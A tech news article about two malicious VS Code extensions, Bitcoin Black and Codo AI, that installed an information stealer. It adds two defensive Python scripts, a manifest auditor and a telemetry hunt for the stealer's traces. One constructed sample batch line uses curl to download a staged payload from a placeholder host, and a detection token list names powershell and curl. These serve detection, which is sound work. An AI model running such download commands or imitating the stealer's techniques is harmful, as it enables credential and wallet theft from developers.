Security researchers have uncovered two malicious extensions on Microsoft's Visual Studio Code Marketplace that were infecting developer systems with information-stealing malware. The extensions were capable of taking screenshots, stealing login details, accessing cryptocurrency wallets, and hijacking browser sessions.
The malicious extensions were listed as Bitcoin Black and Codo AI and were published under the developer name BigBlack. One of them was disguised as a color theme, while the other posed as an AI assistant. At the time of discovery, Codo AI had fewer than 30 downloads, while Bitcoin Black showed only one installation.
According to findings shared by Koi Security, Bitcoin Black declared an activation event of "*", which causes an extension's code to load and run on every event inside VS Code rather than only when a specific feature is used. The extension also had the ability to execute PowerShell commands, which a colour theme never needs and which was considered a serious warning sign.
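The two manifest-level warning signs described above can be checked mechanically. The following audit script is an added example for this article, not code from Koi Security or from the extensions involved. It reads a VS Code extension's package.json, flags an activationEvents entry of "*", and flags an extension that only contributes themes yet declares an entry point (main or browser), which is what gives a theme the ability to run arbitrary code. The extra scan of bundled .bat, .cmd and .ps1 files for download or shell tokens is a generic heuristic of my own; the report does not say where Bitcoin Black's PowerShell invocation lived. Both manifests and the script text are constructed samples, and the extension names and publishers in them are hypothetical.

```python
"""Audit VS Code extension manifests for two red flags: activationEvents "*"
(the extension loads on every event) and an entry point declared by an
extension that only contributes a colour theme. The script-token scan is an
added generic heuristic, not something taken from the report."""
import json
from pathlib import Path

# Constructed sample manifests; these are not the real extensions' package.json files.
BENIGN_THEME_JSON = """{
  "name": "calm-dark",
  "publisher": "example-publisher",
  "version": "1.0.0",
  "engines": {"vscode": "^1.80.0"},
  "contributes": {
    "themes": [{"label": "Calm Dark", "uiTheme": "vs-dark", "path": "./themes/calm-dark.json"}]
  }
}"""

SUSPICIOUS_THEME_JSON = """{
  "name": "hypothetical-theme",
  "publisher": "hypothetical-publisher",
  "version": "1.0.3",
  "engines": {"vscode": "^1.80.0"},
  "activationEvents": ["*"],
  "main": "./out/extension.js",
  "contributes": {
    "themes": [{"label": "Hypothetical Dark", "uiTheme": "vs-dark", "path": "./themes/hypo.json"}]
  }
}"""

# Constructed stand-in for a batch helper an extension might ship alongside its JavaScript.
SUSPICIOUS_SCRIPT_TEXT = "@echo off\ncurl -s -o %TEMP%\\stage.bin https://example.invalid/stage\n"

# Contribution points that never need extension code to run.
THEME_ONLY_KEYS = {"themes", "iconThemes", "productIconThemes"}
# Heuristic tokens for scripts that download files or spawn shells (tune per environment).
SHELL_TOKENS = ("powershell", "curl", "invoke-webrequest")


def audit_manifest(manifest) -> list[str]:
    """Return findings for a package.json given as a dict or as a raw JSON string."""
    if isinstance(manifest, str):
        manifest = json.loads(manifest)
    findings = []
    contributes = manifest.get("contributes") or {}
    theme_only = bool(contributes) and set(contributes) <= THEME_ONLY_KEYS
    if "*" in (manifest.get("activationEvents") or []):
        findings.append("activationEvents contains '*': extension code runs on every VS Code event")
    if theme_only and (manifest.get("main") or manifest.get("browser")):
        findings.append("theme-only extension declares an entry point: code execution is unnecessary for a theme")
    return findings


def scan_script_text(text: str) -> list[str]:
    """Return the SHELL_TOKENS present in a script body (case-insensitive)."""
    lowered = text.lower()
    return [tok for tok in SHELL_TOKENS if tok in lowered]


def audit_extension_dir(ext_dir: Path) -> dict:
    """Audit one installed extension folder: manifest findings plus flagged scripts."""
    result = {"manifest": [], "scripts": {}}
    pkg = ext_dir / "package.json"
    if pkg.is_file():
        result["manifest"] = audit_manifest(pkg.read_text(encoding="utf-8"))
    for pattern in ("*.bat", "*.cmd", "*.ps1"):
        for script in ext_dir.rglob(pattern):
            hits = scan_script_text(script.read_text(encoding="utf-8", errors="ignore"))
            if hits:
                result["scripts"][str(script.relative_to(ext_dir))] = hits
    return result


if __name__ == "__main__":
    for label, raw in (("benign sample", BENIGN_THEME_JSON), ("suspicious sample", SUSPICIOUS_THEME_JSON)):
        print(label, "->", audit_manifest(raw) or ["no findings"])
    print("script tokens ->", scan_script_text(SUSPICIOUS_SCRIPT_TEXT))
    # Default location of user-installed extensions; adjust if VS Code is configured differently.
    ext_root = Path.home() / ".vscode" / "extensions"
    if ext_root.is_dir():
        for ext_dir in sorted(p for p in ext_root.iterdir() if p.is_dir()):
            report = audit_extension_dir(ext_dir)
            if report["manifest"] or report["scripts"]:
                print(ext_dir.name, "->", report)
```

A "*" activation event is not malicious on its own, since some legitimate extensions use it, and many theme packs ship no code at all; the point of the check is that a theme with both an entry point and unconditional activation has no benign reason for that combination, so it deserves a manual look before it is trusted.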
Earlier versions of Bitcoin Black relied on a PowerShell script that downloaded a password-protected archive, an approach that could alert users because it opened a visible PowerShell window. In newer versions, the attackers switched to a batch script that quietly used curl to download the malicious files, keeping the activity hidden from users.
Koi Security researcher Idan Dardikman explained that Codo AI did offer real code help using tools like ChatGPT or DeepSeek, but it also contained hidden malicious code. Both extensions delivered a clean copy of the Lightshot screenshot tool together with a malicious DLL. The DLL was loaded through DLL hijacking (side-loading), so the malware's code ran under the process name runtime.exe.
The malware created folders named Evelyn inside the local app data directory to store the stolen information. This included running processes, clipboard data, Wi-Fi credentials, system details, screenshots, installed programs, and more.
To take over browser sessions, the malware launched Chrome and Edge in headless mode to capture stored cookies. It also targeted crypto wallets such as Phantom, MetaMask, and Exodus, along with saved passwords and credentials.
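The post-infection behaviour described in the last two paragraphs (a process named runtime.exe, staging under a local app data folder called Evelyn, and Chrome or Edge launched headless by something that is not a user shell) is the kind of thing endpoint telemetry can surface. The hunt below is an added example for this article, not detection content from Koi Security or any vendor. It runs three rules over a constructed, simplified event format of the form "kind|parent_image|image_or_path|detail", which is not a real EDR or Sysmon schema; the sample events, the user name "dev", and the list of parents for which a headless browser is considered expected are all my assumptions.

```python
"""Hunt process- and file-creation events for the stealer behaviour the
report describes: runtime.exe from a user-writable path, files written under
%LOCALAPPDATA%\\Evelyn, and a headless Chrome/Edge launched by an unexpected
parent. Event format is a constructed 'kind|parent|image_or_path|detail' line."""
import re

# Constructed sample telemetry; nothing here is captured from the incident.
SAMPLE_EVENTS = """proc|C:\\Windows\\explorer.exe|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|chrome.exe --profile-directory=Default
proc|C:\\Users\\dev\\AppData\\Local\\Temp\\runtime.exe|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|chrome.exe --headless
proc|C:\\Users\\dev\\AppData\\Local\\Temp\\runtime.exe|C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|msedge.exe --headless
file|C:\\Users\\dev\\AppData\\Local\\Temp\\runtime.exe|C:\\Users\\dev\\AppData\\Local\\Evelyn\\screenshot_1.png|create
file|C:\\Windows\\explorer.exe|C:\\Users\\dev\\Documents\\notes.txt|create
proc|C:\\Users\\dev\\AppData\\Local\\Programs\\node\\node.exe|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|chrome.exe --headless
"""

BROWSERS = {"chrome.exe", "msedge.exe"}
# Parents for which a headless browser is expected (browser testing, automation);
# an assumption to tune per environment.
EXPECTED_HEADLESS_PARENTS = {"explorer.exe", "node.exe", "chrome.exe", "msedge.exe"}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")
EVELYN_RE = re.compile(r"\\appdata\\local\\evelyn\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list[dict]:
    """Parse the constructed pipe-separated format into event dicts."""
    events = []
    for line in text.strip().splitlines():
        kind, parent, image, detail = line.split("|", 3)
        events.append({"kind": kind, "parent": parent, "image": image, "detail": detail})
    return events


def evaluate(event: dict) -> list[str]:
    """Return the alert strings one event triggers (empty list if none)."""
    alerts = []
    parent_name, image_name = basename(event["parent"]), basename(event["image"])
    # Rule 1: headless browser spawned by a parent that is not expected to do so.
    if (event["kind"] == "proc" and image_name in BROWSERS
            and "--headless" in event["detail"].lower()
            and parent_name not in EXPECTED_HEADLESS_PARENTS):
        alerts.append(f"headless {image_name} launched by {parent_name}")
    # Rule 2: file written into the staging folder named in the report.
    if event["kind"] == "file" and EVELYN_RE.search(event["image"]):
        alerts.append("file written under %LOCALAPPDATA%\\Evelyn")
    # Rule 3: the process name from the report running outside trusted install paths.
    for role in ("parent", "image"):
        path = event[role]
        if basename(path) == "runtime.exe" and not path.lower().startswith(TRUSTED_PREFIXES):
            alerts.append(f"runtime.exe running from a user-writable path ({role})")
    return alerts


def hunt(text: str) -> list[tuple[int, str]]:
    """Evaluate every event in the stream; return (event index, alert) pairs."""
    return [(i, a) for i, ev in enumerate(parse_events(text)) for a in evaluate(ev)]


if __name__ == "__main__":
    for idx, alert in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {alert}")
```

Rule 3 is deliberately keyed on the process name the report gives, so it is the most brittle of the three; rules 1 and 2 describe behaviour (an unexpected parent driving a headless browser, an unusual staging folder under the user's profile) and survive a rename of the executable. In a real deployment the expected-parent list needs tuning, since developer machines often run headless browsers legitimately from test runners.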
The malicious file was detected by 29 of 72 antivirus engines on VirusTotal. Microsoft has been contacted regarding the issue, but no response had been shared at the time of reporting. Developers are advised to install extensions only from trusted publishers to reduce the risk.
About us:
The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology business and cyber landscape. Built on research-driven, thought leadership and original intellectual property, The Mainstream also curates summits & conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.